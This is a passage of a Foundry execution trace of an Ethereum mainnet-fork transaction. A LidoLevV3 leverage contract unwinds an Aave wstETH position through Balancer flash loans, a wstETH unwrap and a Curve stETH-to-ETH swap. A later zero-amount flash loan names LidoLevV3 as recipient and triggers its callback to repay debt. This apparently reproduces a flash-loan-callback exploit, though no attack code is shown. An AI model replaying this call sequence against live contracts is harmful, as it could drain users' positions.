    │   │   │   │   │   │   ├─ [14620] 0x5f4eC3Df9cbd43714FE2740f5E3616155c5b8419::latestAnswer() [staticcall]
    │   │   │   │   │   │   │   ├─ [7124] 0xE62B71cf983019BFf55bC83B48601ce8419650CC::latestAnswer() [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 226467139000 [2.264e11]
    │   │   │   │   │   │   │   └─ ← [Return] 226467139000 [2.264e11]
    │   │   │   │   │   │   └─ ← [Return] 226467139000 [2.264e11]
    │   │   │   │   │   ├─ [1123] 0xeA51d7853EEFb32b6ee06b1C12E6dcCA88Be0fFE::scaledBalanceOf(LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142]) [staticcall]
    │   │   │   │   │   │   ├─ [603] 0xaC725CB59D16C81061BDeA61041a8A5e73DA9EC6::scaledBalanceOf(LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142]) [delegatecall]
    │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000001d5535af0029ef7e9
    │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000001d5535af0029ef7e9
    │   │   │   │   │   ├─ [1201] 0x102633152313C81cD80419b6EcF66d14Ad68949A::balanceOf(LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142]) [staticcall]
    │   │   │   │   │   │   ├─ [649] 0x15C5620dfFaC7c7366EED66C20Ad222DDbB1eD57::balanceOf(LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142]) [delegatecall]
    │   │   │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   │   ├─ [43723] 0x54586bE62E3c3580375aE3723C145253060Ca0C2::getAssetPrice(0x7f39C581F595B53c5cb19bD0b3f8dA6c935E2Ca0) [staticcall]
    │   │   │   │   │   │   ├─ [38201] 0x8B6851156023f4f5A66F68BEA80851c3D905Ac93::latestAnswer() [staticcall]
    │   │   │   │   │   │   │   ├─ [2120] 0x5f4eC3Df9cbd43714FE2740f5E3616155c5b8419::latestAnswer() [staticcall]
    │   │   │   │   │   │   │   │   ├─ [1124] 0xE62B71cf983019BFf55bC83B48601ce8419650CC::latestAnswer() [staticcall]
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 226467139000 [2.264e11]
    │   │   │   │   │   │   │   │   └─ ← [Return] 226467139000 [2.264e11]
    │   │   │   │   │   │   │   ├─ [31663] 0xae7ab96520DE3A18E5e111B5EaAb095312D7fE84::getPooledEthByShares(1000000000000000000 [1e18]) [staticcall]
    │   │   │   │   │   │   │   │   ├─ [8263] 0xb8FFC3Cd6e7Cf5a098A1c92F48009765B24088Dc::getApp(0xf1f3eb40f5bc1ad1344716ced8b8a0431d840b5783aea1fd01786bc26f35ac0f, 0x3ca7c3e38968823ccb4c78ea688df41356f182ae1d159e4ee608d30d68cef320)
    │   │   │   │   │   │   │   │   │   ├─ [2820] 0x2b33CF282f867A7FF693A66e11B0FcC5552e4425::getApp(0xf1f3eb40f5bc1ad1344716ced8b8a0431d840b5783aea1fd01786bc26f35ac0f, 0x3ca7c3e38968823ccb4c78ea688df41356f182ae1d159e4ee608d30d68cef320) [delegatecall]
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000017144556fd3424edc8fc8a4c940b2d04936d17eb
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000017144556fd3424edc8fc8a4c940b2d04936d17eb
    │   │   │   │   │   │   │   │   ├─ [12783] 0x17144556fd3424EDC8Fc8A4C940B2D04936d17eb::getPooledEthByShares(1000000000000000000 [1e18]) [delegatecall]
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000100956f9c9ea1aa1
    │   │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000100956f9c9ea1aa1
    │   │   │   │   │   │   │   └─ ← [Return] 261694195375 [2.616e11]
    │   │   │   │   │   │   └─ ← [Return] 261694195375 [2.616e11]
    │   │   │   │   │   ├─ [1146] aEthwstETH::scaledBalanceOf(LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142]) [staticcall]
    │   │   │   │   │   │   ├─ [626] 0x7EfFD7b47Bfd17e52fB7559d3f924201b9DbfF3d::scaledBalanceOf(LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142]) [delegatecall]
    │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000001d36b1bc383a5d656
    │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000001d36b1bc383a5d656
    │   │   │   │   │   ├─ emit Withdraw(param0: 0x7f39C581F595B53c5cb19bD0b3f8dA6c935E2Ca0, param1: LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142], param2: LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142], param3: 307089429045260432253 [3.07e20])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xc9d7ec48cd0d839522455f78914adfeda8686316bb6819e0888e4bcd349e01b4: 0x0000000000027663729b40e592704c5b00000000033e929c15f06a84a035c0fc → 0x000000000002766ce68fdf7f0444770c00000000033e92af91f2e811efcd65bd
    │   │   │   │   │   │   @ 0xa69c31ad883ca5d0f069e8f3539b578234aa915726262552bd610e701e134b71: 0 → 0x000000000000000000000000000000000000000000000010a5b8d0afe845b37d
    │   │   │   │   │   │   @ 0xc9d7ec48cd0d839522455f78914adfeda8686316bb6819e0888e4bcd349e01ba: 0x000000000000000000000000000000000000000000000000015264950e1c4ee8 → 0x0000000000000000000000000000000000000000000000000153285af4e45435
    │   │   │   │   │   │   @ 0xc9d7ec48cd0d839522455f78914adfeda8686316bb6819e0888e4bcd349e01b5: 0x00000000000000000000010065bb60a700000000003e63a3a2ff26930e8043e0 → 0x00000000000000000000010065bb6f7700000000003e63ac0a117aa9ac9230ef
    │   │   │   │   │   │   @ 0xc9d7ec48cd0d839522455f78914adfeda8686316bb6819e0888e4bcd349e01b3: 0x000000000000028e35e9d01ebf8fccd700000000033b9de7cfad859aecb1167c → 0x000000000000028e7cf6194a37766d6200000000033b9de7e3d39a6f9a7c08df
    │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000010a5b8d0afe845b37d
    │   │   │   │   └─ ← [Return] 307089429045260432253 [3.07e20]
    │   │   │   └─ ← [Return] 307089429045260432253 [3.07e20]
    │   │   ├─ [534] 0x7f39C581F595B53c5cb19bD0b3f8dA6c935E2Ca0::balanceOf(LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142]) [staticcall]
    │   │   │   └─ ← [Return] 307089429045260432253 [3.07e20]
    │   │   ├─ [41266] 0x7f39C581F595B53c5cb19bD0b3f8dA6c935E2Ca0::unwrap(307089429045260432253 [3.07e20])
    │   │   │   ├─ [6163] 0xae7ab96520DE3A18E5e111B5EaAb095312D7fE84::getPooledEthByShares(307089429045260432253 [3.07e20]) [staticcall]
    │   │   │   │   ├─ [1763] 0xb8FFC3Cd6e7Cf5a098A1c92F48009765B24088Dc::getApp(0xf1f3eb40f5bc1ad1344716ced8b8a0431d840b5783aea1fd01786bc26f35ac0f, 0x3ca7c3e38968823ccb4c78ea688df41356f182ae1d159e4ee608d30d68cef320)
    │   │   │   │   │   ├─ [820] 0x2b33CF282f867A7FF693A66e11B0FcC5552e4425::getApp(0xf1f3eb40f5bc1ad1344716ced8b8a0431d840b5783aea1fd01786bc26f35ac0f, 0x3ca7c3e38968823ccb4c78ea688df41356f182ae1d159e4ee608d30d68cef320) [delegatecall]
    │   │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000017144556fd3424edc8fc8a4c940b2d04936d17eb
    │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000017144556fd3424edc8fc8a4c940b2d04936d17eb
    │   │   │   │   ├─ [2783] 0x17144556fd3424EDC8Fc8A4C940B2D04936d17eb::getPooledEthByShares(307089429045260432253 [3.07e20]) [delegatecall]
    │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000133ca270864a06bd2b
    │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000133ca270864a06bd2b
    │   │   │   ├─ emit Transfer(from: LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142], to: 0x0000000000000000000000000000000000000000, value: 307089429045260432253 [3.07e20])
    │   │   │   ├─ [24083] 0xae7ab96520DE3A18E5e111B5EaAb095312D7fE84::transfer(LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142], 354857315711054167339 [3.548e20])
    │   │   │   │   ├─ [1763] 0xb8FFC3Cd6e7Cf5a098A1c92F48009765B24088Dc::getApp(0xf1f3eb40f5bc1ad1344716ced8b8a0431d840b5783aea1fd01786bc26f35ac0f, 0x3ca7c3e38968823ccb4c78ea688df41356f182ae1d159e4ee608d30d68cef320)
    │   │   │   │   │   ├─ [820] 0x2b33CF282f867A7FF693A66e11B0FcC5552e4425::getApp(0xf1f3eb40f5bc1ad1344716ced8b8a0431d840b5783aea1fd01786bc26f35ac0f, 0x3ca7c3e38968823ccb4c78ea688df41356f182ae1d159e4ee608d30d68cef320) [delegatecall]
    │   │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000017144556fd3424edc8fc8a4c940b2d04936d17eb
    │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000017144556fd3424edc8fc8a4c940b2d04936d17eb
    │   │   │   │   ├─ [20697] 0x17144556fd3424EDC8Fc8A4C940B2D04936d17eb::transfer(LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142], 354857315711054167339 [3.548e20]) [delegatecall]
    │   │   │   │   │   ├─ emit Transfer(from: 0x7f39C581F595B53c5cb19bD0b3f8dA6c935E2Ca0, to: LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142], value: 354857315711054167339 [3.548e20])
    │   │   │   │   │   ├─ emit TransferShares(param0: 0x7f39C581F595B53c5cb19bD0b3f8dA6c935E2Ca0, param1: LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142], param2: 307089429045260432252 [3.07e20])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xf37caed32e4e49c83636e0f1684f3f4a9a23c463a49eb17cd63abd50680b378b: 0x00000000000000000000000000000000000000000002cc58a2280e4bbf781190 → 0x00000000000000000000000000000000000000000002cc47fc6f3d9bd7325e14
    │   │   │   │   │   │   @ 0xa69c31ad883ca5d0f069e8f3539b578234aa915726262552bd610e701e134b71: 1 → 0x000000000000000000000000000000000000000000000010a5b8d0afe845b37d
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xa69c31ad883ca5d0f069e8f3539b578234aa915726262552bd610e701e134b71: 0x000000000000000000000000000000000000000000000010a5b8d0afe845b37d → 0
    │   │   │   │   @ 2: 0x00000000000000000000000000000000000000000002cc58a224dbd12a68d9da → 0x00000000000000000000000000000000000000000002cc47fc6c0b214223265d
    │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000133ca270864a06bd2b
    │   │   ├─ [6468] 0xae7ab96520DE3A18E5e111B5EaAb095312D7fE84::balanceOf(LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142]) [staticcall]
    │   │   │   ├─ [1763] 0xb8FFC3Cd6e7Cf5a098A1c92F48009765B24088Dc::getApp(0xf1f3eb40f5bc1ad1344716ced8b8a0431d840b5783aea1fd01786bc26f35ac0f, 0x3ca7c3e38968823ccb4c78ea688df41356f182ae1d159e4ee608d30d68cef320)
    │   │   │   │   ├─ [820] 0x2b33CF282f867A7FF693A66e11B0FcC5552e4425::getApp(0xf1f3eb40f5bc1ad1344716ced8b8a0431d840b5783aea1fd01786bc26f35ac0f, 0x3ca7c3e38968823ccb4c78ea688df41356f182ae1d159e4ee608d30d68cef320) [delegatecall]
    │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000017144556fd3424edc8fc8a4c940b2d04936d17eb
    │   │   │   │   └─ ← [Return] 0x00000000000000000000000017144556fd3424edc8fc8a4c940b2d04936d17eb
    │   │   │   ├─ [3088] 0x17144556fd3424EDC8Fc8A4C940B2D04936d17eb::balanceOf(LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142]) [delegatecall]
    │   │   │   │   └─ ← [Return] 354857315711054167339 [3.548e20]
    │   │   │   └─ ← [Return] 354857315711054167339 [3.548e20]
    │   │   ├─ [6468] 0xae7ab96520DE3A18E5e111B5EaAb095312D7fE84::balanceOf(LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142]) [staticcall]
    │   │   │   ├─ [1763] 0xb8FFC3Cd6e7Cf5a098A1c92F48009765B24088Dc::getApp(0xf1f3eb40f5bc1ad1344716ced8b8a0431d840b5783aea1fd01786bc26f35ac0f, 0x3ca7c3e38968823ccb4c78ea688df41356f182ae1d159e4ee608d30d68cef320)
    │   │   │   │   ├─ [820] 0x2b33CF282f867A7FF693A66e11B0FcC5552e4425::getApp(0xf1f3eb40f5bc1ad1344716ced8b8a0431d840b5783aea1fd01786bc26f35ac0f, 0x3ca7c3e38968823ccb4c78ea688df41356f182ae1d159e4ee608d30d68cef320) [delegatecall]
    │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000017144556fd3424edc8fc8a4c940b2d04936d17eb
    │   │   │   │   └─ ← [Return] 0x00000000000000000000000017144556fd3424edc8fc8a4c940b2d04936d17eb
    │   │   │   ├─ [3088] 0x17144556fd3424EDC8Fc8A4C940B2D04936d17eb::balanceOf(LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142]) [delegatecall]
    │   │   │   │   └─ ← [Return] 354857315711054167339 [3.548e20]
    │   │   │   └─ ← [Return] 354857315711054167339 [3.548e20]
    │   │   ├─ [90531] 0xDC24316b9AE028F1497c275EB9192a3Ea0f67022::exchange(1, 0, 354857315711054167339 [3.548e20], 354502458395343113172 [3.545e20])
    │   │   │   ├─ [8468] 0xae7ab96520DE3A18E5e111B5EaAb095312D7fE84::balanceOf(0xDC24316b9AE028F1497c275EB9192a3Ea0f67022) [staticcall]
    │   │   │   │   ├─ [1763] 0xb8FFC3Cd6e7Cf5a098A1c92F48009765B24088Dc::getApp(0xf1f3eb40f5bc1ad1344716ced8b8a0431d840b5783aea1fd01786bc26f35ac0f, 0x3ca7c3e38968823ccb4c78ea688df41356f182ae1d159e4ee608d30d68cef320)
    │   │   │   │   │   ├─ [820] 0x2b33CF282f867A7FF693A66e11B0FcC5552e4425::getApp(0xf1f3eb40f5bc1ad1344716ced8b8a0431d840b5783aea1fd01786bc26f35ac0f, 0x3ca7c3e38968823ccb4c78ea688df41356f182ae1d159e4ee608d30d68cef320) [delegatecall]
    │   │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000017144556fd3424edc8fc8a4c940b2d04936d17eb
    │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000017144556fd3424edc8fc8a4c940b2d04936d17eb
    │   │   │   │   ├─ [5088] 0x17144556fd3424EDC8Fc8A4C940B2D04936d17eb::balanceOf(0xDC24316b9AE028F1497c275EB9192a3Ea0f67022) [delegatecall]
    │   │   │   │   │   └─ ← [Return] 45713660374355418056101 [4.571e22]
    │   │   │   │   └─ ← [Return] 45713660374355418056101 [4.571e22]
    │   │   │   ├─ [16796] 0xae7ab96520DE3A18E5e111B5EaAb095312D7fE84::transferFrom(LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142], 0xDC24316b9AE028F1497c275EB9192a3Ea0f67022, 354857315711054167339 [3.548e20])
    │   │   │   │   ├─ [1763] 0xb8FFC3Cd6e7Cf5a098A1c92F48009765B24088Dc::getApp(0xf1f3eb40f5bc1ad1344716ced8b8a0431d840b5783aea1fd01786bc26f35ac0f, 0x3ca7c3e38968823ccb4c78ea688df41356f182ae1d159e4ee608d30d68cef320)
    │   │   │   │   │   ├─ [820] 0x2b33CF282f867A7FF693A66e11B0FcC5552e4425::getApp(0xf1f3eb40f5bc1ad1344716ced8b8a0431d840b5783aea1fd01786bc26f35ac0f, 0x3ca7c3e38968823ccb4c78ea688df41356f182ae1d159e4ee608d30d68cef320) [delegatecall]
    │   │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000017144556fd3424edc8fc8a4c940b2d04936d17eb
    │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000017144556fd3424edc8fc8a4c940b2d04936d17eb
    │   │   │   │   ├─ [13404] 0x17144556fd3424EDC8Fc8A4C940B2D04936d17eb::transferFrom(LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142], 0xDC24316b9AE028F1497c275EB9192a3Ea0f67022, 354857315711054167339 [3.548e20]) [delegatecall]
    │   │   │   │   │   ├─ emit Transfer(from: LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142], to: 0xDC24316b9AE028F1497c275EB9192a3Ea0f67022, value: 354857315711054167339 [3.548e20])
    │   │   │   │   │   ├─ emit TransferShares(param0: LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142], param1: 0xDC24316b9AE028F1497c275EB9192a3Ea0f67022, param2: 307089429045260432252 [3.07e20])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xa69c31ad883ca5d0f069e8f3539b578234aa915726262552bd610e701e134b71: 0x000000000000000000000000000000000000000000000010a5b8d0afe845b37d → 1
    │   │   │   │   │   │   @ 0xae68078d7ee25b2b7bcb7d4b9fe9acf61f251fe08ff637df07889375d8385158: 0x0000000000000000000000000000000000000000000008608e51fc6c2e715c9d → 0x000000000000000000000000000000000000000000000871340acd1c16b71019
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [18] PRECOMPILES::identity(0x0000000000000000000000000000000000000000000000000000000000000000)
    │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   │   ├─ [55] LidoLevV3::fallback{value: 354675630591246269703}()
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ emit TokenExchange(param0: LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142], param1: 1, param2: 354857315711054167339 [3.548e20], param3: 0, param4: 354675630591246269703 [3.546e20])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xb10e2d527612073b26eecdfd717e6a320cf44b4afac2b0732d9fcbe2b7fa0cf6: 0x00000000000000000000000000000000000000000000000000076555c262af9e → 0x000000000000000000000000000000000000000000000000004667ba77202182
    │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000133a1cf6dee6e6fd07
    │   │   ├─ [21974] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::deposit{value: 354675630591246269703}()
    │   │   │   ├─ emit Deposit(dst: LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142], wad: 354675630591246269703 [3.546e20])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x72abcc8c1956d2c5aceb3e4a4a26c855bc628660ed76bd1c9129d9ab812d24ea: 0 → 0x0000000000000000000000000000000000000000000000133a1cf6dee6e6fd07
    │   │   │   └─ ← [Stop]
    │   │   ├─ [3262] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::transfer(Balancer: [0xBA12222222228d8Ba445958a75a0704d566BF2C8], 318973831042619036856 [3.189e20])
    │   │   │   ├─ emit Transfer(from: LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142], to: Balancer: [0xBA12222222228d8Ba445958a75a0704d566BF2C8], value: 318973831042619036856 [3.189e20])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x72abcc8c1956d2c5aceb3e4a4a26c855bc628660ed76bd1c9129d9ab812d24ea: 0x0000000000000000000000000000000000000000000000133a1cf6dee6e6fd07 → 0x000000000000000000000000000000000000000000000001ef7645888220a84f
    │   │   │   │   @ 0x3a0f132b80eb284c2ac247698d2ec7dce851ca420b700161ad6082d0e9762150: 0x000000000000000000000000000000000000000000000bc5b45b26818033598a → 0x000000000000000000000000000000000000000000000bd6ff01d7d7e4f9ae42
    │   │   │   └─ ← [Return] true
    │   │   └─ ← [Stop]
    │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(Balancer: [0xBA12222222228d8Ba445958a75a0704d566BF2C8]) [staticcall]
    │   │   └─ ← [Return] 55912009748616849239618 [5.591e22]
    │   ├─ emit FlashLoan(param0: LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142], param1: 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, param2: 318973831042619036856 [3.189e20], param3: 0)
    │   └─ ← [Stop]
    ├─ [149932] Balancer::flashLoan(LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142], [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2], [0], 0x00000000000000000000000000000000000000000000000000000000000000020000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496)
    │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(Balancer: [0xBA12222222228d8Ba445958a75a0704d566BF2C8]) [staticcall]
    │   │   └─ ← [Return] 55912009748616849239618 [5.591e22]
    │   ├─ [350] 0xce88686553686DA562CE7Cea497CE749DA109f9F::getFlashLoanFeePercentage() [staticcall]
    │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   ├─ [3262] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::transfer(LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142], 0)
    │   │   ├─ emit Transfer(from: Balancer: [0xBA12222222228d8Ba445958a75a0704d566BF2C8], to: LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142], value: 0)
    │   │   └─ ← [Return] true
    │   ├─ [131707] LidoLevV3::receiveFlashLoan([0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2], [0], [0], 0x00000000000000000000000000000000000000000000000000000000000000020000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496)
    │   │   ├─ [3038] 0xeA51d7853EEFb32b6ee06b1C12E6dcCA88Be0fFE::balanceOf(LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142]) [staticcall]
    │   │   │   ├─ [2486] 0xaC725CB59D16C81061BDeA61041a8A5e73DA9EC6::balanceOf(LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142]) [delegatecall]
    │   │   │   │   ├─ [1325] 0x87870Bca3F3fD6335C3F4ce8392D69350B4fA4E2::getReserveNormalizedVariableDebt(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2) [staticcall]
    │   │   │   │   │   ├─ [805] 0x5FAab9E1adbddaD0a08734BE8a52185Fd6558E14::getReserveNormalizedVariableDebt(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2) [delegatecall]
    │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000035826ff2489bafa33adf90f
    │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000035826ff2489bafa33adf90f
    │   │   │   │   └─ ← [Return] 35002954502486078893 [3.5e19]
    │   │   │   └─ ← [Return] 35002954502486078893 [3.5e19]
    │   │   ├─ [47974] 0x87870Bca3F3fD6335C3F4ce8392D69350B4fA4E2::repay(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, 35002954502486078893 [3.5e19], 2, LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142])
    │   │   │   ├─ [47439] 0x5FAab9E1adbddaD0a08734BE8a52185Fd6558E14::repay(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, 35002954502486078893 [3.5e19], 2, LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142]) [delegatecall]
    │   │   │   │   ├─ [45793] 0x5547D7d54d10C359108e36d098016c4020443Fd4::40e95de6(0000000000000000000000000000000000000000000000000000000000000034000000000000000000000000000000000000000000000000000000000000003682b974bece31f54dd185455479045bf3d5fe6f936188dd73e07668d61e052f29000000000000000000000000c02aaa39b223fe8d0a0e5c4f27ead9083c756cc2000000000000000000000000000000000000000000000001e5c379aa99d7b5ad0000000000000000000000000000000000000000000000000000000000000002000000000000000000000000cd6ca2f0d0c182c5049d9a1f65cde51a706ae1420000000000000000000000000000000000000000000000000000000000000000) [delegatecall]
    │   │   │   │   │   ├─ [968] 0xeA51d7853EEFb32b6ee06b1C12E6dcCA88Be0fFE::scaledTotalSupply() [staticcall]
    │   │   │   │   │   │   ├─ [419] 0xaC725CB59D16C81061BDeA61041a8A5e73DA9EC6::scaledTotalSupply() [delegatecall]
    │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000005fe897aa24c32ea04b0b
    │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000005fe897aa24c32ea04b0b
    │   │   │   │   │   ├─ [1482] 0x102633152313C81cD80419b6EcF66d14Ad68949A::getSupplyData() [staticcall]
    │   │   │   │   │   │   ├─ [921] 0x15C5620dfFaC7c7366EED66C20Ad222DDbB1eD57::getSupplyData() [delegatecall]
    │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   │   ├─ [1201] 0x102633152313C81cD80419b6EcF66d14Ad68949A::balanceOf(LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142]) [staticcall]
    │   │   │   │   │   │   ├─ [649] 0x15C5620dfFaC7c7366EED66C20Ad222DDbB1eD57::balanceOf(LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142]) [delegatecall]
    │   │   │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   │   ├─ [3038] 0xeA51d7853EEFb32b6ee06b1C12E6dcCA88Be0fFE::balanceOf(LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142]) [staticcall]
    │   │   │   │   │   │   ├─ [2486] 0xaC725CB59D16C81061BDeA61041a8A5e73DA9EC6::balanceOf(LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142]) [delegatecall]
    │   │   │   │   │   │   │   ├─ [1325] 0x87870Bca3F3fD6335C3F4ce8392D69350B4fA4E2::getReserveNormalizedVariableDebt(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2) [staticcall]
    │   │   │   │   │   │   │   │   ├─ [805] 0x5FAab9E1adbddaD0a08734BE8a52185Fd6558E14::getReserveNormalizedVariableDebt(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2) [delegatecall]
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000035826ff2489bafa33adf90f
    │   │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000035826ff2489bafa33adf90f
    │   │   │   │   │   │   │   └─ ← [Return] 35002954502486078893 [3.5e19]
    │   │   │   │   │   │   └─ ← [Return] 35002954502486078893 [3.5e19]
    │   │   │   │   │   ├─ [9487] 0xeA51d7853EEFb32b6ee06b1C12E6dcCA88Be0fFE::burn(LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142], 35002954502486078893 [3.5e19], 1035024658069051456948664591 [1.035e27])
    │   │   │   │   │   │   ├─ [8926] 0xaC725CB59D16C81061BDeA61041a8A5e73DA9EC6::burn(LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142], 35002954502486078893 [3.5e19], 1035024658069051456948664591 [1.035e27]) [delegatecall]
    │   │   │   │   │   │   │   ├─ [1201] 0x8164Cc65827dcFe994AB23944CBC90e0aa80bFcb::handleAction(LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142], 452915389085583398685451 [4.529e23], 33818474013737809897 [3.381e19])
    │   │   │   │   │   │   │   │   ├─ [675] 0xE7B67F44eA304DD7f6d215b13686637ff64CD2B2::handleAction(LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142], 452915389085583398685451 [4.529e23], 33818474013737809897 [3.381e19]) [delegatecall]
    │   │   │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   │   │   └─ ← [Return]
    │   │   │   │   │   │   │   ├─ emit Transfer(from: LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142], to: 0x0000000000000000000000000000000000000000, value: 35002954502486078893 [3.5e19])
    │   │   │   │   │   │   │   ├─ emit Burn(param0: LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142], param1: 0x0000000000000000000000000000000000000000, param2: 35002954502486078893 [3.5e19], param3: 0, param4: 1035024658069051456948664591 [1.035e27])
    │   │   │   │   │   │   │   ├─  storage changes:
